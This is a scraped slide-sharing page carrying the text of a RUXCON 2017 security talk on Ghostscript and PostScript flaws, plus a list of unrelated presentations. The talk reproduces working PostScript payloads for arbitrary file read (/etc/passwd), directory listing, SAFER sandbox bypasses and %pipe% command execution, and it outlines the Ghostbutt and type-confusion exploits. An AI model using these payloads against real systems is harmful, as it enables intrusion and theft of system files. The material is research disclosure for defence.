a ghost from postscript
play

A GHOST FROM POSTSCRIPT for RUXCON 2017 A GHOST FROM POSTSCRIPT - PowerPoint PPT Presentation

Sep 08, 2022 •287 likes •818 views

REDRAIN & MIN(SPARK) ZHENG A GHOST FROM POSTSCRIPT for RUXCON 2017 A GHOST FROM POSTSCRIPT WHO ARE WE redrain min(spark) zheng Qihoo 360CERT CUHK PhD Alibaba Security Expert Low-level security researcher Pentester with interest in

  1. REDRAIN & MIN(SPARK) ZHENG A GHOST FROM POSTSCRIPT for RUXCON 2017

  2. A GHOST FROM POSTSCRIPT WHO ARE WE ▸ redrain ▸ min(spark) zheng Qihoo 360CERT CUHK PhD Alibaba Security Expert Low-level security researcher Pentester with interest in big guys rootredrain@gmail.com zhengmin1989@gmail.com https:/ /cert.360.cn https:/ /jaq.alibaba.com

  3. A GHOST FROM POSTSCRIPT AGENDA ▸ Postscript and GhostScript ▸ The Ghost from Postscript 1. Primer 1. Arbitrary File Read 2. Postscript syntax 2. Arbitrary Command Execution 3. Weakness 3. Arbitrary Code Execution 4. Ghostscript SAFER mode ▸ More Attack Surfaces 5. Bypass Ghostscript sandbox 1. Attacking softwares 2. Attacking printers

  4. A GHOST FROM POSTSCRIPT POSTSCRIPT AND GHOSTSCRIPT ▸ Postscript Primer Postscript(PS) is a page description language in the electronic publishing and desktop publishing business. Postscript Level 1 introduced in 1984 Postscript Level 2 introduced in 1991 Postscript Level 3 introduced in 1997

  5. A GHOST FROM POSTSCRIPT POSTSCRIPT AND GHOSTSCRIPT ▸ Syntax PostScript is a Turing-complete programming language, and an interpreted, stack-based language. The language syntax uses reverse Polish notation, which makes the order of operations unambiguous, and we should keep the layout of the stack in mind.

  6. A GHOST FROM POSTSCRIPT POSTSCRIPT AND GHOSTSCRIPT ▸ Syntax 1 4 (3+4)*(5-1) add sub 3 5 7 3 4 add 5 1 sub mul == 7 4 mul 1 7 5 28 7

  7. A GHOST FROM POSTSCRIPT POSTSCRIPT AND GHOSTSCRIPT ▸ Ghostscript Primer Ghostscript is a suite of software based on an interpreter for Adobe PostScript and Portable Document Format (PDF) page description languages. Its main purposes are the rasterization or rendering of such page description language files, for the display or printing of document pages, and the conversion between PostScript and PDF files.

  8. A GHOST FROM POSTSCRIPT POSTSCRIPT AND GHOSTSCRIPT ▸ Ghostscript Primer GhostScript console GhostScript GUI System invocation name System invocation name Unix/X11 Ghostview *Unix gs MS Windows and later gswin32c MS Windows and later GSView Linux gv OpenVMS gs Operating System/2 gsos2 Operating System/2 GSView

  9. A GHOST FROM POSTSCRIPT POSTSCRIPT AND GHOSTSCRIPT ▸ Adobe PostScript Charstring Operators

  10. A GHOST FROM POSTSCRIPT POSTSCRIPT AND GHOSTSCRIPT ▸ Adobe PostScript Charstring Operators with global and local subroutines in OpenType, a new callgsubr instruction added, multiple new hinting-related instructions introduced (hstemhm, hintmask,cntrmask, ...), new arithmetic and logic instructions (and, or, not, abs, add, sub, neg, ...), new instructions managing the stack (dup, exch, index, roll), new miscellaneous instructions (random), new instructions operating on the transient array (get, put), dropped support for OtherSubrs (removed callothersubr).

  11. some interesting operators: file [Open named file with specified access] readstring [read string from file] writestring [write characters of string to file] readline [read line from file into string] filenameforall [access to all files and sub- directories in that directory with a *] A GHOST FROM POSTSCRIPT POSTSCRIPT AND GHOSTSCRIPT ▸ Adobe PostScript Charstring Operators

  12. A GHOST FROM POSTSCRIPT POSTSCRIPT AND GHOSTSCRIPT ▸ Adobe PostScript Charstring Operators why does a rasterized language provide such rich file operators? Are there any weaknesses here?

  13. A GHOST FROM POSTSCRIPT POSTSCRIPT WEAKNESSES ▸ Adobe PostScript Arbitrary File Read %!PS /buff 1024 string def /file_obj (/etc/passwd) (r) file def file_obj buff readstring buff print quit

  14. A GHOST FROM POSTSCRIPT POSTSCRIPT WEAKNESSES ▸ Adobe PostScript Directory Listing %!PS (/home/*) {==} 256 string filenameforall

  15. A GHOST FROM POSTSCRIPT GHOSTSCRIPT WEAKNESSES ▸ GhostScript Documentation Ghostscript also supports the following IODevice in addition to a subset of those defined in the Adobe documentation: • %pipe%command , which opens a pipe on the given command. This is supported only on operating systems that provide popen (primarily Unix systems, and not all of those). Does it means Ghostscript will execut other command through using “%pipe%command”???

  16. A GHOST FROM POSTSCRIPT GHOSTSCRIPT WEAKNESSES ▸ GhostScript Documentation

  17. A GHOST FROM POSTSCRIPT GHOSTSCRIPT WEAKNESSES ▸ GhostScript Shell Command Execution ./ gs-921-linux-x86_64 -sDEVICE = pdfwrite -sOutputFile =% pipe % id %!PS /OutputFile (%pipe%id) %set command injection (pdfwrite)finddevice %use pdfwrite device putdeviceprops setdevice %set completion and start quit

  18. A GHOST FROM POSTSCRIPT GHOSTSCRIPT WEAKNESSES ▸ Ghostscript SAFER sandbox Disables the deletefile and renamefile operators, and the ability to open piped commands (%pipe%cmd) at all. Only %stdout and %stderr can be opened for writing. Disables reading of files other than %stdin, those given as a command line argument, or those contained on one of the paths given by LIBPATH and FONTPATH and specified by the system params / FontResourceDir and /GenericResourceDir.

  19. A GHOST FROM POSTSCRIPT GHOSTSCRIPT WEAKNESSES ▸ Ghostscript SAFER sandbox Arbitrary File Read Arbitrary Command Execution

  21. A GHOST FROM POSTSCRIPT THE GHOST FROM POSTSCRIPT ▸ Bypass SAFER sandbox Although SAFER sandbox disable most of file operators, there is still a advanced operator alived. we can replace file into .libfile %!PS (/ etc/passwd) .libfile { 256 string readstring } if {print} if quit

  22. A GHOST FROM POSTSCRIPT THE GHOST FROM POSTSCRIPT ▸ Bypass SAFER sandbox again When I was writing this slides, I found another advanced operator alived .findlibfile %!PS (/ etc/passwd) .findlibfile { 256 string readstring } if {print} if quit

  23. A GHOST FROM POSTSCRIPT THE GHOST FROM POSTSCRIPT ▸ Bypass SAFER sandbox again and again Project Zero researcher Tavis discovered a greate bypass in Oct last year. He found two advanced operators OutputICCProfile and putdeviceparams. These two operators are not described distinctly in documentation, however I found them in sourcecode ./base/gsdparam.c

  24. A GHOST FROM POSTSCRIPT THE GHOST FROM POSTSCRIPT ▸ Bypass SAFER sandbox again and again PoC : %!PS currentdevice null true mark /OutputICCProfile (%pipe%id > /dev/tty) .putdeviceparams quit

  26. A GHOST FROM POSTSCRIPT MEMORY CORRUPTION OF GHOSTSCRIPT gelivable: (chiefly China, Internet slang) awesome, incredible, amazi ng, extraordinary

  27. A GHOST FROM POSTSCRIPT "GHOSTBUTT" SAFER BYPASS Ghostbutt is an OOB and type confuse bug in GhostScript. It is named by HD Moore and it has a website: http:/ /ghostbutt.com. GhostScript doesn’ t check the bound of the operator stack when it executes .eqproc operator.

  28. A GHOST FROM POSTSCRIPT "GHOSTBUTT" SAFER BYPASS An attacker may use a crafted .ps file to achieve an out-of-bound attack in GhostScript and bypass the SAFER mode. The exp can be found at: https:/ / github.com/rapid7 /metasploit-framework/pull/8316/files. There are four main steps: Step 1: Using .eqproc operator to control the stack using a crafted string buffer.

  29. A GHOST FROM POSTSCRIPT "GHOSTBUTT" SAFER BYPASS Step 2: Using the string buffer to change the reference of currentdevice object to String object. Step 3: Changing the currentdevice->LockSafetyParams to 0. (Close the SAFER)

  30. A GHOST FROM POSTSCRIPT "GHOSTBUTT" SAFER BYPASS Step 4: Execute unsandboxed commands. Fix -- checking the bound and checking the type of parameters (CVE-2017-8291):

  31. A GHOST FROM POSTSCRIPT REMOTE CODE EXECUTION: TYPE CONFUSION The vulnerability code exists in the zinitialize_dsc_parser(). The method gets the memory data using dict_memory() and treats it as an object to call its gs_alloc_struct() method. Note that the memory data can be controlled by the attacker and the method doesn’ t check the validity of data.

  32. A GHOST FROM POSTSCRIPT REMOTE CODE EXECUTION: TYPE CONFUSION Only two lines of POC can crash the program which uses ghostscript (libgs.so) as the .ps file processor. The attacker can craft a fake object to hijack the program count. %RAX and %RDI can be controlled by the attacker. Next step is to find a way to do the heap spray for the ROP chain.

  33. A GHOST FROM POSTSCRIPT REMOTE CODE EXECUTION: TYPE CONFUSION The .ps file supports hexadecimal data as a member of dict. That’ s the best candidate for heap spray. Therefore, we could spray the heap using <gadget gadget gadget gadget gadget …> through the .ps file. For demonstration, we disabled ASLR. Then we used a crafted .ps file to let the Evince Document Viewer execute our ROP chain - system(“touch a”).

  34. A GHOST FROM POSTSCRIPT MORE ATTACK SURFACE ▸ Extend Ghostscript to other software These are all possible to exploit via PDF , PS, EPS, XPS formats. Because Ghostscript is a basic interpreter for postscript, many software using Ghostscript or parsing Postscript are also vulnerable. E.g: Imagemagick, GraphicsMagick, Evince, Gimp… and any more.

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Erin Murray The general first idea was to have a playful ghost flying around a building for

Erin Murray The general first idea was to have a playful ghost flying around a building for

Erin Murray The general first idea was to have a playful ghost flying around a building for their own enjoyment. The story of the ghost then became more prominent as I developed my storyboards. The ghost was looking for a place to haunt

336 views • 10 slides
The Ghost in the Machine Dawie van den Heever SSM with implants 2 SSM with implants 3 SSM

The Ghost in the Machine Dawie van den Heever SSM with implants 2 SSM with implants 3 SSM

1 The Ghost in the Machine Dawie van den Heever SSM with implants 2 SSM with implants 3 SSM with implants 4 ECG reconstruction &amp; classification 5 Robotic limbs 6 PANDAS 7 Ghost in the Shell 8 Ghost in the Machine 9

419 views • 17 slides
Ghost Peaks: How to Fix a Haunting Problem Jacob A. Rebholz Teledyne Tekmar VOC Product Line

Ghost Peaks: How to Fix a Haunting Problem Jacob A. Rebholz Teledyne Tekmar VOC Product Line

Ghost Peaks: How to Fix a Haunting Problem Jacob A. Rebholz Teledyne Tekmar VOC Product Line Manager Outline of Topics What is a ghost peak? How to identify ghost peaks and their source How to correct various sources of

561 views • 43 slides
Piloting HCV GHOST in Michigan www.michigan.gov/hepatitis November 29, 2017 Joe Coyle, MPH

Piloting HCV GHOST in Michigan www.michigan.gov/hepatitis November 29, 2017 Joe Coyle, MPH

Piloting HCV GHOST in Michigan www.michigan.gov/hepatitis November 29, 2017 Joe Coyle, MPH Outline MDHHS HCV Surveillance Basics of HCV GHOST Example of GHOST in Action Implications for Public Health Surveillance MDHHS HCV

455 views • 34 slides
Ghost River State of the Watershed (2018) - Ghost Watershed Alliance Society Photo credit: R.

Ghost River State of the Watershed (2018) - Ghost Watershed Alliance Society Photo credit: R.

Ghost River State of the Watershed (2018) - Ghost Watershed Alliance Society Photo credit: R. Drury State of the Watershed Report Formal process by Alberta Government Followed Handbook for State of the Watershed Reporting Used

470 views • 44 slides
PostScript Undead: Pwning the web with a 35 year old language Jens Mller, Vladislav Mladenov,

PostScript Undead: Pwning the web with a 35 year old language Jens Mller, Vladislav Mladenov,

PostScript Undead: Pwning the web with a 35 year old language Jens Mller, Vladislav Mladenov, Dennis Felsch, Jrg Schwenk About @jensvoid Passionate bounty hunter Interests: IoT, web security Likes mixing old tech and new tech

822 views • 34 slides
Tap n Ghost A Compilation of Novel Attack Techniques against Smartphone Touchscreens Seita

Tap n Ghost A Compilation of Novel Attack Techniques against Smartphone Touchscreens Seita

Tap n Ghost A Compilation of Novel Attack Techniques against Smartphone Touchscreens Seita Maruyama 1 , Satohiro Wakabayashi 1 , Tatsuya Mori 1, 2 1 Waseda University, Japan 2 RIKEN AIP, Japan Tap n Ghost An attack against smartphones

508 views • 30 slides
Ghost effect by curvature Providence, November 2011 M&amp;MOCS MATHEMATICS AND MECHANICS OF

Ghost effect by curvature Providence, November 2011 M&amp;MOCS MATHEMATICS AND MECHANICS OF

Ghost effect by curvature Providence, November 2011 M&amp;MOCS MATHEMATICS AND MECHANICS OF COMPLEX SYSTEMS Universit` a dellAquila - Italy Ghost effect by curvature p. 1/39 Joint project with : L. Arkeryd R. Marra A. Nouri

749 views • 39 slides
Bullinger, Hort, Riplinger, and the Mystery of Romans 16 Introduction Today we want to

Bullinger, Hort, Riplinger, and the Mystery of Romans 16 Introduction Today we want to

Bullinger, Hort, Riplinger, and the Mystery of Romans 16 Introduction Today we want to consider EWBs Postscript Theory from the following angles: What is the Postscript Theory? How does Bullinger seek to justify the theory?

361 views • 8 slides
Renormalizable ghost-free gravity Alexey Koshelev Universidade da Beira Interior &amp; Vrije

Renormalizable ghost-free gravity Alexey Koshelev Universidade da Beira Interior &amp; Vrije

Renormalizable ghost-free gravity Alexey Koshelev Universidade da Beira Interior &amp; Vrije Universiteit Brussel p-adics 2015 and Brankos fest Belgrade, September 11, 2015 Happy Birthday, Branko! Renormalizable ghost-free gravity Set-up

407 views • 23 slides
Ghost River Watershed Riparian Health Inventory 2011 Highlights March 10, 2012 Benchlands, AB

Ghost River Watershed Riparian Health Inventory 2011 Highlights March 10, 2012 Benchlands, AB

Ghost River Watershed Riparian Health Inventory 2011 Highlights March 10, 2012 Benchlands, AB Ghost River Watershed 2011 Ri par i an those green zones of water-loving vegetation along rivers, streams, lakes and wetlands

817 views • 47 slides
d 4 x g [ RF 1 ( ) R + RF Towards Ghost free and singularity free construction of

d 4 x g [ RF 1 ( ) R + RF Towards Ghost free and singularity free construction of

d 4 x g [ RF 1 ( ) R + RF Towards Ghost free and singularity free construction of gravity Anupam Mazumdar R F 5 ( ) R + Lancaster University R Warren Siegel, Tirthabir Biswas

970 views • 33 slides
The Global Ghost Gear Initiative: A global cross-sectoral approach to tackling derelict fishing

The Global Ghost Gear Initiative: A global cross-sectoral approach to tackling derelict fishing

The Global Ghost Gear Initiative: A global cross-sectoral approach to tackling derelict fishing gear in seafood supply chains Ingrid Giskes Global Head of Campaign Chair of Global Ghost Gear Initiative A global problem In 2009, UNEP &amp; FAO

362 views • 35 slides
Agent for Ms. Pac-Man vs. Ghost Team Competition ,

Agent for Ms. Pac-Man vs. Ghost Team Competition ,

Agent for Ms. Pac-Man vs. Ghost Team Competition , 2012030142 513 - Target Try to maximize your score by eating as many pills/power pills/ghosts as you can

504 views • 9 slides
May 17, 2020 Glory be to the Father And to the Son And to the Holy Ghost As it was in the

May 17, 2020 Glory be to the Father And to the Son And to the Holy Ghost As it was in the

May 17, 2020 Glory be to the Father And to the Son And to the Holy Ghost As it was in the beginning, Is now and ever shall be, World without end! Amen, amen Call to Worship (our ancient writings usher us into this ritual) Why do we praise

473 views • 28 slides
dfdfsadsfasdfadfadfadfafdfdf Glory be to the Father And to the Son And to the Holy Ghost As it

dfdfsadsfasdfadfadfadfafdfdf Glory be to the Father And to the Son And to the Holy Ghost As it

April 19, 2020 dfdfsadsfasdfadfadfadfafdfdf Glory be to the Father And to the Son And to the Holy Ghost As it was in the beginning, Is now and ever shall be, World without end! Amen, amen Call to Worship Why do we praise Christ this

387 views • 35 slides
2PAC 2Furious: Envisioning an iOS compromise in 2019 Marco Grassi - @marcograss Liang Chen -

2PAC 2Furious: Envisioning an iOS compromise in 2019 Marco Grassi - @marcograss Liang Chen -

2PAC 2Furious: Envisioning an iOS compromise in 2019 Marco Grassi - @marcograss Liang Chen - @chenliang0817 About Us Members of Tencent KEEN Security Lab (formerly known as KeenTeam) Marco (@marcograss): My main focus is

846 views • 61 slides
Bypassing Microsoft JEA role capabilities for fun &amp; profit whoami Cristhian Parrot -

Bypassing Microsoft JEA role capabilities for fun &amp; profit whoami Cristhian Parrot -

Bypassing Microsoft JEA role capabilities for fun &amp; profit whoami Cristhian Parrot - @elc0rr3Km1n0s Sr. Penetration Tester &amp; Lead Auditor @Airbus Father, Bug Hunter, Tech-entrepreneur Plan Intro Install Prerequisites

376 views • 22 slides
Cloud Interconnections William B. Norton Console, Chief Scientist Last Updated: 9/19/16 4:04pm

Cloud Interconnections William B. Norton Console, Chief Scientist Last Updated: 9/19/16 4:04pm

Cloud Interconnect Models v1.6 Cloud Interconnections William B. Norton Console, Chief Scientist Last Updated: 9/19/16 4:04pm Comments to the author welcome: wbn@console.net Cloud Interconnections William B. Norton Console, Chief Scientist

300 views • 12 slides
Exploi'ng Unpatched iOS Vulnerabili'es for Fun and Profit

Exploi'ng Unpatched iOS Vulnerabili'es for Fun and Profit

Exploi'ng Unpatched iOS Vulnerabili'es for Fun and Profit Yeongjin Jang, Tielei Wang, Byoungyoung Lee, and Billy Lau Georgia Tech Informa;on Security Center

989 views • 84 slides
gpucc: An Open-Source GPGPU Compiler Jingyue Wu (jingyue@google.com) , Eli Bendersky, Mark

gpucc: An Open-Source GPGPU Compiler Jingyue Wu (jingyue@google.com) , Eli Bendersky, Mark

gpucc: An Open-Source GPGPU Compiler Jingyue Wu (jingyue@google.com) , Eli Bendersky, Mark Heffernan, Chris Leary, Jacques Pienaar, Bjarke Roune, Rob Springer, Xuetian Weng, Artem Belevich, Robert Hundt One-Slide Overview Motivation Lack

436 views • 39 slides
the kernel bypass with RDMA! Using the RDMA infrastructure for performance while retaining kernel

the kernel bypass with RDMA! Using the RDMA infrastructure for performance while retaining kernel

Userspace networking: beyond the kernel bypass with RDMA! Using the RDMA infrastructure for performance while retaining kernel integration Benot Ganne, bganne@cisco.com 30/01/2020 1 Why a native network driver? Why userspace networking?

773 views • 8 slides
XDP (eXpress Data Path) as a building block for other FOSS projects Jesper Dangaard Brouer (Red

XDP (eXpress Data Path) as a building block for other FOSS projects Jesper Dangaard Brouer (Red

XDP (eXpress Data Path) as a building block for other FOSS projects Jesper Dangaard Brouer (Red Hat) Magnus Karlsson (Intel) FOSDEM 2019 Brussels, Feb 2019 1 Framing XDP XDP: new in-kernel programmable (eBPF) layer before netstack Similar

689 views • 34 slides
Banked Multiported Register Files for High-Frequency Superscalar Microprocessors Jessica H. Tseng

Banked Multiported Register Files for High-Frequency Superscalar Microprocessors Jessica H. Tseng

Banked Multiported Register Files for High-Frequency Superscalar Microprocessors Jessica H. Tseng and Krste Asanovi MIT Laboratory for Computer Science, Cambridge, MA 02139, USA ISCA2003 1 Motivation Increasing demand on number of

661 views • 30 slides

More recommend